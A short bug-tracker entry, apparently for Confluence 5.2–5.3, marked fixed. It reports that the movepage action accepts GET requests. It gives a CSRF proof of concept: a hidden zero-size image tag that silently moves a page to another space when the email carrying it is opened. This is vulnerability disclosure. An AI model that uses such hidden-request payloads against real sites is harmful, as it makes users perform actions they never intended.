-
Type:
Bug
-
Resolution: Fixed
-
Priority:
Medium
-
Affects Version/s: 5.2, 5.3
-
Component/s: None
-
5
Seems like you can easily move pages around spaces by just hitting the movepage action using GET, like this:
http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2
Malicious example of how to exploit this (in an email message):
<img src="http://localhost:8080/confluence/pages/movepage.action?pageId=787055&position=topLevel&spaceKey=S2" style="height:0;width:0">
(after opening the email, the page has been moved to S2 space)
scary!!
- mentioned in
-
Page Loading...